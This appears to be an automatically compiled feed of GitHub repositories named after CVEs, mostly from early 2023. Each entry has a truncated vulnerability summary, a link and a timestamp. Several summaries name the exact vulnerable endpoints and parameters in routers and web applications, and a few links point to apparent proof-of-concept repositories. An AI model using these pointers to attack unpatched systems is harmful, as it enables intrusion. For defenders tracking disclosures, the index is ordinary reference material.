**On Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17, the video-core process insecurely extracts the fields from the "shard" table of its SQLite database, leading to a buffer overflow on the stack. The strcpy call overflows the destination buffer, which has a size of 128 bytes. An attacker can s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3912](https://github.com/Live-Hack-CVE/CVE-2018-3912) create time: 2023-02-17T06:45:42Z

**In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects \Device\EMPMPAUIO an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9453](https://github.com/Live-Hack-CVE/CVE-2020-9453) create time: 2023-02-17T06:45:49Z

**Cross-site Scripting (XSS) - Generic in GitHub repository nuxt/framework prior to 3.2.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0878](https://github.com/Live-Hack-CVE/CVE-2023-0878) create time: 2023-02-17T06:46:05Z

**Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.12. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0879](https://github.com/Live-Hack-CVE/CVE-2023-0879) create time: 2023-02-17T06:46:01Z

**Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0877](https://github.com/Live-Hack-CVE/CVE-2023-0877) create time: 2023-02-17T06:45:57Z

**Misinterpretation of Input in GitHub repository thorsten/phpmyfaq prior to 3.1.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0880](https://github.com/Live-Hack-CVE/CVE-2023-0880) create time: 2023-02-17T06:45:53Z

**no description** : [timpen432/-Wh0Am1001-CVE-2023-21753](https://github.com/timpen432/-Wh0Am1001-CVE-2023-21753) create time: 2023-02-14T04:43:39Z

**A vulnerability was found in webbuilders-group silverstripe-kapost-bridge 0.3.3. It has been declared as critical. Affected by this vulnerability is the function index/getPreview of the file code/control/KapostService.php. The manipulation leads to sql injection. The attack can be launched remotely. Upgrading to versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10077](https://github.com/Live-Hack-CVE/CVE-2015-10077) create time: 2023-02-16T23:58:41Z

**no description** : [Therootkitsec/-CVE-2017-7269](https://github.com/Therootkitsec/-CVE-2017-7269) create time: 2023-02-17T00:31:27Z

**Scanning a QR code that contained a javascript: URL would have resulted in the Javascript being executed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17003](https://github.com/Live-Hack-CVE/CVE-2019-17003) create time: 2023-02-16T23:57:45Z

**bleach.clean behavior parsing style attributes could result in a regular expression denial of service (ReDoS). Calls to bleach.clean with an allowed tag with an allowed style attribute are vulnerable to ReDoS. For example, bleach.clean(..., attributes={'a': ['style']}). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6817](https://github.com/Live-Hack-CVE/CVE-2020-6817) create time: 2023-02-16T23:57:48Z

**The Raccoon attack is a timing attack on DHE ciphersuites inherit in the TLS specification. To mitigate this vulnerability, Firefox disabled support for DHE ciphersuites. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12413](https://github.com/Live-Hack-CVE/CVE-2020-12413) create time: 2023-02-16T23:57:41Z

**Thunderbird versions prior to 91.3.0 are vulnerable to the heap overflow described in CVE-2021-43527 when processing S/MIME messages. Thunderbird versions 91.3.0 and later will not call the vulnerable code when processing S/MIME messages that contain certificates with DER-encoded DSA or RSA-PSS signatures. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43529](https://github.com/Live-Hack-CVE/CVE-2021-43529) create time: 2023-02-16T23:57:55Z

**A mutation XSS affects users calling bleach.clean with all of: svg or math in the allowed tags p or br in allowed tags style, title, noscript, script, textarea, noframes, iframe, or xmp in allowed tags the keyword argument strip_comments=False Note: none of the above tags are in the default allowed tags and strip_comme CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23980](https://github.com/Live-Hack-CVE/CVE-2021-23980) create time: 2023-02-16T23:57:52Z

**A vulnerability was found in CodenameOne 7.0.70. It has been classified as problematic. Affected is an unknown function. The manipulation leads to use of implicit intent for sensitive communication. It is possible to launch the attack remotely. Upgrading to version 7.0.71 is able to address this issue. The name of the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4903](https://github.com/Live-Hack-CVE/CVE-2022-4903) create time: 2023-02-16T23:58:37Z

**TIANJIE CPE906-3 is vulnerable to password disclosure. This is present on Software Version WEB5.0_LCD_20200513, Firmware Version MV8.003, and Hardware Version CPF906-V5.0_LCD_20200513. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47703](https://github.com/Live-Hack-CVE/CVE-2022-47703) create time: 2023-02-16T23:58:06Z

**SiteServerCMS 7.1.3 sscms has a file read vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44299](https://github.com/Live-Hack-CVE/CVE-2022-44299) create time: 2023-02-16T23:58:02Z

**There was an open redirection vulnerability pollbot, which was used in https://pollbot.services.mozilla.com/ and https://pollbot.stage.mozaws.net/ An attacker could have redirected anyone to malicious sites. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0637](https://github.com/Live-Hack-CVE/CVE-2022-0637) create time: 2023-02-16T23:57:58Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the webpage parameter at /goform/formWlanGuestSetup. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24344](https://github.com/Live-Hack-CVE/CVE-2023-24344) create time: 2023-02-16T23:58:34Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSchedule. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24343](https://github.com/Live-Hack-CVE/CVE-2023-24343) create time: 2023-02-16T23:58:30Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the wan_connected parameter at /goform/formEasySetupWizard3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24346](https://github.com/Live-Hack-CVE/CVE-2023-24346) create time: 2023-02-16T23:58:27Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the curTime parameter at /goform/formSetWanDhcpplus. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24345](https://github.com/Live-Hack-CVE/CVE-2023-24345) create time: 2023-02-16T23:58:24Z

**D-Link N300 WI-FI Router DIR-605L v2.13B01 was discovered to contain a stack overflow via the webpage parameter at /goform/formSetWanDhcpplus. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24347](https://github.com/Live-Hack-CVE/CVE-2023-24347) create time: 2023-02-16T23:58:20Z

**opentelemetry-go-contrib is a collection of extensions for OpenTelemetry-Go. The v0.38.0 release of `go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp` uses the `httpconv.ServerRequest` function to annotate metric measurements for the `http.server.request_content_length`, `http.server.response_content_lengt CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25151](https://github.com/Live-Hack-CVE/CVE-2023-25151) create time: 2023-02-16T23:58:14Z

**HashiCorp Nomad and Nomad Enterprise 1.2.15 up to 1.3.8, and 1.4.3 jobs using a maliciously compressed artifact stanza source can cause excessive disk usage. Fixed in 1.2.16, 1.3.9, and 1.4.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0821](https://github.com/Live-Hack-CVE/CVE-2023-0821) create time: 2023-02-16T23:58:10Z

**Nextcloud office/richdocuments is an office suit for the nextcloud server platform. In affected versions the Collabora integration can be tricked to provide access to any file without proper permission validation. As a result any user with access to Collabora can obtain the content of other users files. It is recommend CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25150](https://github.com/Live-Hack-CVE/CVE-2023-25150) create time: 2023-02-16T23:57:37Z

**When GELI reads a key file from standard input, it does not reuse the key file to initialize multiple providers at once resulting in the second and subsequent devices silently using a NULL key as the user key file. If a user only uses a key file without a user passphrase, the master key is encrypted with an empty key f CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0751](https://github.com/Live-Hack-CVE/CVE-2023-0751) create time: 2023-02-16T23:57:34Z

**no description** : [DanielRuf/CVE-2023-23752](https://github.com/DanielRuf/CVE-2023-23752) create time: 2023-02-16T22:43:32Z

**Insufficient granularity of access control in out-of-band management in some Intel(R) Atom and Intel Xeon Scalable Processors may allow a privileged user to potentially enable escalation of privilege via adjacent network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21216](https://github.com/Live-Hack-CVE/CVE-2022-21216) create time: 2023-02-16T21:44:04Z

**Insufficient control flow management in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36278](https://github.com/Live-Hack-CVE/CVE-2022-36278) create time: 2023-02-16T21:44:01Z

**Path traversal in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33892](https://github.com/Live-Hack-CVE/CVE-2022-33892) create time: 2023-02-16T21:43:57Z

**Uncontrolled search path in the Intel(R) Battery Life Diagnostic Tool software before version 2.2.0 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36398](https://github.com/Live-Hack-CVE/CVE-2022-36398) create time: 2023-02-16T21:43:54Z

**Use after free in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30539](https://github.com/Live-Hack-CVE/CVE-2022-30539) create time: 2023-02-16T21:43:50Z

**Out-of-bounds read in the Intel(R) Iris(R) Xe MAX drivers for Windows before version 100.0.5.1474 may allow a privileged user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30531](https://github.com/Live-Hack-CVE/CVE-2022-30531) create time: 2023-02-16T21:43:46Z

**Out-of-bounds read in firmware for the Intel(R) Integrated Sensor Solution before versions 5.4.2.4579v3, 5.4.1.4479 and 5.0.0.4143 may allow a privileged user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30339](https://github.com/Live-Hack-CVE/CVE-2022-30339) create time: 2023-02-16T21:43:43Z

**Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26837](https://github.com/Live-Hack-CVE/CVE-2022-26837) create time: 2023-02-16T21:43:39Z

**Uncontrolled search path element in the Intel(R) oneAPI DPC++/C++ Compiler Runtime before version 2022.0 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26421](https://github.com/Live-Hack-CVE/CVE-2022-26421) create time: 2023-02-16T21:43:35Z

**Uncontrolled search path element in the Intel(R) oneAPI Toolkit OpenMP before version 2022.1 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26345](https://github.com/Live-Hack-CVE/CVE-2022-26345) create time: 2023-02-16T21:43:32Z

**Improper access control in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26343](https://github.com/Live-Hack-CVE/CVE-2022-26343) create time: 2023-02-16T21:43:28Z

**Uncontrolled search path element in the Intel(R) Distribution for Python programming language before version 2022.1 for Intel(R) oneAPI Toolkits may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26032](https://github.com/Live-Hack-CVE/CVE-2022-26032) create time: 2023-02-16T21:43:24Z

**Uncontrolled search path element in the Intel(R) oneAPI Collective Communications Library (oneCCL) before version 2021.6 for Intel(R) oneAPI Base Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26425](https://github.com/Live-Hack-CVE/CVE-2022-26425) create time: 2023-02-16T21:43:21Z

**Improper authentication in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32570](https://github.com/Live-Hack-CVE/CVE-2022-32570) create time: 2023-02-16T21:43:16Z

**Improper neutralization in the Intel(R) Quartus Prime Pro and Standard edition software may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26840](https://github.com/Live-Hack-CVE/CVE-2022-26840) create time: 2023-02-16T21:43:13Z

**Uncontrolled search path element in the Intel(R) oneAPI Data Analytics Library (oneDAL) before version 2021.5 for Intel(R) oneAPI Base Toolkit may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25905](https://github.com/Live-Hack-CVE/CVE-2022-25905) create time: 2023-02-16T21:43:09Z

**Protection mechanism failure in the Intel(R) DSA software before version 22.4.26 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30530](https://github.com/Live-Hack-CVE/CVE-2022-30530) create time: 2023-02-16T21:43:04Z

**Insufficient control flow management for the Intel(R) SGX SDK software for Linux before version 2.16.100.1 may allow an authenticated user to potentially enable information disclosure via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26841](https://github.com/Live-Hack-CVE/CVE-2022-26841) create time: 2023-02-16T21:43:00Z

**Stack overflow vulnerability in Aspire E5-475G 's BIOS firmware, in the FpGui module, a second call to GetVariable services allows local attackers to execute arbitrary code in the UEFI DXE phase and gain escalated privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40080](https://github.com/Live-Hack-CVE/CVE-2022-40080) create time: 2023-02-16T21:42:57Z

**Uncontrolled search path element in the Intel(R) oneAPI Deep Neural Network (oneDNN) before version 2022.1 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26076](https://github.com/Live-Hack-CVE/CVE-2022-26076) create time: 2023-02-16T21:42:53Z

**Relative Path Traversal vulnerability in YugaByte, Inc. Yugabyte Managed (PlatformReplicationManager.Java modules) allows Path Traversal. This vulnerability is associated with program files PlatformReplicationManager.Java. This issue affects Yugabyte Managed: from 2.0 through 2.13. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0745](https://github.com/Live-Hack-CVE/CVE-2023-0745) create time: 2023-02-16T21:42:46Z

**A vulnerability was found in dimtion Shaarlier up to 1.2.2. It has been declared as critical. Affected by this vulnerability is the function createTag of the file app/src/main/java/com/dimtion/shaarlier/TagsSource.java of the component Tag Handler. The manipulation leads to sql injection. Upgrading to version 1.2.3 is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10076](https://github.com/Live-Hack-CVE/CVE-2015-10076) create time: 2023-02-16T19:30:40Z

**The ImageMagick Engine plugin for WordPress is vulnerable to deserialization of untrusted input via the 'cli_path' parameter in versions up to, and including 1.7.5. This makes it possible for unauthenticated users to call files using a PHAR wrapper, granted they can trick a site administrator into performing an action CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3568](https://github.com/Live-Hack-CVE/CVE-2022-3568) create time: 2023-02-16T19:31:05Z

**SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1722](https://github.com/Live-Hack-CVE/CVE-2022-1722) create time: 2023-02-16T19:31:02Z

**Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1721](https://github.com/Live-Hack-CVE/CVE-2022-1721) create time: 2023-02-16T19:30:58Z

**SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1713](https://github.com/Live-Hack-CVE/CVE-2022-1713) create time: 2023-02-16T19:30:54Z

**Improper Input Validation in GitHub repository jgraph/drawio prior to 18.0.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1727](https://github.com/Live-Hack-CVE/CVE-2022-1727) create time: 2023-02-16T19:30:51Z

**Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1767](https://github.com/Live-Hack-CVE/CVE-2022-1767) create time: 2023-02-16T19:30:47Z

**Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.0.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1774](https://github.com/Live-Hack-CVE/CVE-2022-1774) create time: 2023-02-16T19:30:43Z

**SQL Injection in GitHub repository ampache/ampache prior to 5.5.7,develop. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0771](https://github.com/Live-Hack-CVE/CVE-2023-0771) create time: 2023-02-16T19:31:09Z

**A vulnerability has been identified that, if exploited, could result in a local user elevating their privilege level to NT AUTHORITY\SYSTEM on a Citrix Virtual Apps and Desktops Windows VDA. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24483](https://github.com/Live-Hack-CVE/CVE-2023-24483) create time: 2023-02-16T19:30:36Z

**Undici is an HTTP/1.1 client for Node.js. Starting with version 2.0.0 and prior to version 5.19.1, the undici library does not protect `host` HTTP header from CRLF injection vulnerabilities. This issue is patched in Undici v5.19.1. As a workaround, sanitize the `headers.host` string before passing to undici. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23936](https://github.com/Live-Hack-CVE/CVE-2023-23936) create time: 2023-02-16T19:30:33Z

**Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24807](https://github.com/Live-Hack-CVE/CVE-2023-24807) create time: 2023-02-16T19:30:29Z

**Vulnerabilities have been identified that, collectively, allow a standard Windows user to perform operations as SYSTEM on the computer running Citrix Workspace app. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24485](https://github.com/Live-Hack-CVE/CVE-2023-24485) create time: 2023-02-16T19:30:25Z

**A malicious user can cause log files to be written to a directory that they do not have permission to write to. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24484](https://github.com/Live-Hack-CVE/CVE-2023-24484) create time: 2023-02-16T19:30:21Z

**Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. All Argo CD versions starting with 2.3.0-rc1 and prior to 2.3.17, 2.4.23 2.5.11, and 2.6.2 are vulnerable to an improper authorization bug which allows users who have the ability to update at least one cluster secret to update any cluster secret. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23947](https://github.com/Live-Hack-CVE/CVE-2023-23947) create time: 2023-02-16T19:30:18Z

**ChurchCRM 4.5.3 and below was discovered to contain a stored cross-site scripting (XSS) vulnerability at /api/public/register/family. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24690](https://github.com/Live-Hack-CVE/CVE-2023-24690) create time: 2023-02-16T19:30:08Z

**In WAGO Unmanaged Switch (852-111/000-001) in firmware version 01 an undocumented configuration interface without authorization allows an remote attacker to read system information and configure a limited set of parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3843](https://github.com/Live-Hack-CVE/CVE-2022-3843) create time: 2023-02-16T17:16:33Z

**TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the province parameter at setting/delStaticDhcpRules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24236](https://github.com/Live-Hack-CVE/CVE-2023-24236) create time: 2023-02-16T17:16:44Z

**Due to improper parameter filtering in the sequalize js library, can a attacker peform injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22579](https://github.com/Live-Hack-CVE/CVE-2023-22579) create time: 2023-02-16T17:16:41Z

**Due to improper artibute filtering in the sequalize js library, can a attacker peform SQL injections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22578](https://github.com/Live-Hack-CVE/CVE-2023-22578) create time: 2023-02-16T17:16:37Z

**containerd is an open source container runtime. A bug was found in containerd prior to versions 1.6.18 and 1.5.18 where supplementary groups are not set up properly inside a container. If an attacker has direct access to a container and manipulates their supplementary group access, they may be able to use supplementary CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25173](https://github.com/Live-Hack-CVE/CVE-2023-25173) create time: 2023-02-16T17:16:29Z

**containerd is an open source container runtime. Before versions 1.6.18 and 1.5.18, when importing an OCI image, there was no limit on the number of bytes read for certain files. A maliciously crafted image with a large file where a limit was not applied could cause a denial of service. This bug has been fixed in contai CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25153](https://github.com/Live-Hack-CVE/CVE-2023-25153) create time: 2023-02-16T17:16:26Z

**Cross site scripting (XSS) vulnerability in flatCore-CMS 2.2.15 allows attackers to execute arbitrary code via description field on the new page creation form. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40555](https://github.com/Live-Hack-CVE/CVE-2021-40555) create time: 2023-02-16T17:15:34Z

**It was discovered that the sls-logging was not verifying hostnames in TLS certificates due to a misuse of the javax.net.ssl.SSLSocketFactory API. A malicious attacker in a privileged network position could abuse this to perform a man-in-the-middle attack. A successful man-in-the-middle attack would allow them to interc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48308](https://github.com/Live-Hack-CVE/CVE-2022-48308) create time: 2023-02-16T17:15:59Z

**It was discovered that the Magritte-ftp was not verifying hostnames in TLS certificates due to a misuse of the javax.net.ssl.SSLSocketFactory API. A malicious attacker in a privileged network position could abuse this to perform a man-in-the-middle attack. A successful man-in-the-middle attack would allow them to inter CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48307](https://github.com/Live-Hack-CVE/CVE-2022-48307) create time: 2023-02-16T17:15:55Z

**Improper Validation of Certificate with Host Mismatch vulnerability in Gotham Chat IRC helper of Palantir Gotham allows A malicious attacker in a privileged network position could abuse this to perform a man-in-the-middle attack. A successful man-in-the-middle attack would allow them to intercept, read, or modify netwo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48306](https://github.com/Live-Hack-CVE/CVE-2022-48306) create time: 2023-02-16T17:15:52Z

**Palantir Gotham versions prior to 3.22.11.2 included an unauthenticated endpoint that would load portions of maliciously crafted zip files to memory. An attacker could repeatedly upload a malicious zip file, which would allow them to exhaust memory resources on the dispatch server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27897](https://github.com/Live-Hack-CVE/CVE-2022-27897) create time: 2023-02-16T17:15:48Z

**Palantir Gotham versions prior to 3.22.11.2 included an unauthenticated endpoint that would have allowed an attacker to exhaust the memory of the Gotham dispatch service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27892](https://github.com/Live-Hack-CVE/CVE-2022-27892) create time: 2023-02-16T17:15:44Z

**Palantir Gotham included an unauthenticated endpoint that listed all active usernames on the stack with an active session. The affected services have been patched and automatically deployed to all Apollo-managed Gotham instances. It is highly recommended that customers upgrade all affected services to the latest versio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27891](https://github.com/Live-Hack-CVE/CVE-2022-27891) create time: 2023-02-16T17:15:41Z

**It was discovered that the sls-logging was not verifying hostnames in TLS certificates due to a misuse of the javax.net.ssl.SSLSocketFactory API. A malicious attacker in a privileged network position could abuse this to perform a man-in-the-middle attack. A successful man-in-the-middle attack would allow them to interc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27890](https://github.com/Live-Hack-CVE/CVE-2022-27890) create time: 2023-02-16T17:15:37Z

**Reflected Cross Site Scripting Vulnerability in PandoraFMS <= v766** : [Argonx21/CVE-2022-47373](https://github.com/Argonx21/CVE-2022-47373) create time: 2023-02-16T17:10:25Z

**no description** : [damodarnaik/CVE-2022-45436](https://github.com/damodarnaik/CVE-2022-45436) create time: 2023-02-16T17:03:30Z

**Stored Cross Site Scripting Vulnerability in the network maps edit functionality** : [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980) create time: 2023-02-16T16:42:12Z

**TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the city parameter at setting/delStaticDhcpRules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24238](https://github.com/Live-Hack-CVE/CVE-2023-24238) create time: 2023-02-16T17:16:22Z

**Due to improper input filtering in the sequalize js library, can malicious queries lead to sensitive information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22580](https://github.com/Live-Hack-CVE/CVE-2023-22580) create time: 2023-02-16T17:16:18Z

**Zulip is an open-source team collaboration tool. In versions of zulip prior to commit `2f6c5a8` but after commit `04cf68b` users could upload files with arbitrary `Content-Type` which would be served from the Zulip hostname with `Content-Disposition: inline` and no `Content-Security-Policy` header, allowing them to tri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22735](https://github.com/Live-Hack-CVE/CVE-2023-22735) create time: 2023-02-16T17:16:15Z

**TYPO3 is a free and open source Content Management Framework released under the GNU General Public License. In affected versions the TYPO3 core component `GeneralUtility::getIndpEnv()` uses the unfiltered server environment variable `PATH_INFO`, which allows attackers to inject malicious content. In combination with th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24814](https://github.com/Live-Hack-CVE/CVE-2023-24814) create time: 2023-02-16T17:16:10Z

**APOC (Awesome Procedures on Cypher) is an add-on library for Neo4j. An XML External Entity (XXE) vulnerability found in the apoc.import.graphml procedure of APOC core plugin prior to version 5.5.0 in Neo4j graph database. XML External Entity (XXE) injection occurs when the XML parser allows external entities to be reso CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23926](https://github.com/Live-Hack-CVE/CVE-2023-23926) create time: 2023-02-16T17:16:06Z

**In Eternal Terminal 6.2.1, TelemetryService uses fixed paths in /tmp. For example, a local attacker can create /tmp/.sentry-native-etserver with mode 0777 before the etserver process is started. The attacker can choose to read sensitive information from that file, or modify the information in that file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23558](https://github.com/Live-Hack-CVE/CVE-2023-23558) create time: 2023-02-16T17:16:02Z

**cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. In affected versions `Cipher.update_into` would accept Python objects which implement the buffer protocol, but provide only immutable buffers. This would allow immutable objects (such as `bytes`) to be mutated, thus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23931](https://github.com/Live-Hack-CVE/CVE-2023-23931) create time: 2023-02-16T17:15:28Z

**CVE-2017-5124 RCE 0-Day** : [grandDancer/CVE-2017-5124-RCE-0-Day](https://github.com/grandDancer/CVE-2017-5124-RCE-0-Day) create time: 2023-02-16T15:36:38Z

**Ricoh mp_c4504ex devices with firmware 1.06 mishandle credentials. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43969](https://github.com/Live-Hack-CVE/CVE-2022-43969) create time: 2023-02-16T16:07:22Z

**Qaelum DOSE 18.08 through 21.1 before 21.2 allows Directory Traversal via the loadimages name parameter. It allows a user to specify an arbitrary location on the server's filesystem from which to load an image. (Only images are displayed to the attacker. All other files are loaded but not displayed.) The Content-Type r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38731](https://github.com/Live-Hack-CVE/CVE-2022-38731) create time: 2023-02-16T16:07:18Z

**In ExpressionEngine before 7.2.6, remote code execution can be achieved by an authenticated Control Panel user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22953](https://github.com/Live-Hack-CVE/CVE-2023-22953) create time: 2023-02-16T16:07:07Z

**Server-Side Request Forgery (SSRF), Improperly Controlled Modification of Dynamically-Determined Object Attributes, Improper Restriction of Excessive Authentication Attempts vulnerability in YugaByte, Inc. Yugabyte Managed allows Accessing Functionality Not Properly Constrained by ACLs, Communication Channel Manipulati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0574](https://github.com/Live-Hack-CVE/CVE-2023-0574) create time: 2023-02-16T16:07:03Z

**Dompdf is an HTML to PDF converter written in php. Due to the difference in the attribute parser of Dompdf and php-svg-lib, an attacker can still call arbitrary URLs with arbitrary protocols. Dompdf parses the href attribute of `image` tags and respects `xlink:href` even if `href` is specified. However, php-svg-lib, wh CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24813](https://github.com/Live-Hack-CVE/CVE-2023-24813) create time: 2023-02-16T16:06:54Z

